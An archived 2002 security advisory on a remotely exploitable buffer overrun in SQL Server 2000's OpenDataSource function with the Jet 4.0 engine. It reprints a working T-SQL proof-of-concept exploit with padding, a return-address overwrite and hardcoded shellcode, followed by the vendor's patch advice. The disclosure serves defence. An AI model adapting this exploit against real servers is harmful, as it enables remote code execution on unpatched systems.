Buffer Overrun Vulnerability in Microsoft SQL Server 2000

A vulnerability exists in SQL Server 2000 when used in conjunction with the Microsoft Jet 4.0 database engine.

Ken Pfeil

June 20, 2002

4 Min Read
ITPro Today logo in a gray background | ITPro Today

Reported June 19, 2002, by NextGeneration Security Software.

VERSIONS AFFECTED

 

  • Microsoft SQL Server 2000 and all service packs

 

DESCRIPTION

A vulnerability exists in SQL Server 2000 when used inconjunction with the Microsoft Jet 4.0 database engine that can lead to anattacker executing arbitrary code on the vulnerable system. This vulnerabilitystems from a remotely exploitable bufferoverrun in the OpenDataSource function.

DEMONSTRATION

 

The discoverer posted the following code asproof-of-concept:

 

Simple Proof of Concept
***********************
This Transact SQL Script will create a file called "SQL-ODSJET-BO" on the root of the C: drive
on Windows 2000 SP 2 machines
 
 
-------8<---------
 
-- Simple Proof of Concept
-- Exploits a buffer overrun in OpenDataSource()
--
-- Demonstrates how to exploit a UNICODE overflow using T-SQL
-- Calls CreateFile() creating a file called c:SQL-ODSJET-BO
-- I'm overwriting the saved return address with 0x42B0C9DC
-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
-- The address holds a jmp esp instruction.
--
-- To protect against this overflow download the latest Jet Service 
-- pack from Microsoft - http://www.microsoft.com/
-- 
-- David Litchfield ([email protected])
-- 19th June 2002
 
 
 
declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)
 
select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141
 
while @cnt < 1063
begin 
                select @padding = @padding + @pad
                select @cnt = @cnt + 1
end
 
-- overwrite the saved return address
 
select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747
 
-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2
-- change if running a different service pack
 
select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions'
exec (@exploit)
 
------->8---------

 

 

VENDOR RESPONSE

Thevendor, Microsoft, recommends thataffected users apply the patchmentioned in the Microsoft article "ACC2002: Updated Version of MicrosoftJet 4.0 Available in Download Center," Q282010.

 

CREDIT
Discoveredby Mark Litchfield of Next GenerationSecurity Software.

Read more about:

Microsoft
Sign up for the ITPro Today newsletter
Stay on top of the IT universe with commentary, news analysis, how-to's, and tips delivered to your inbox daily.

You May Also Like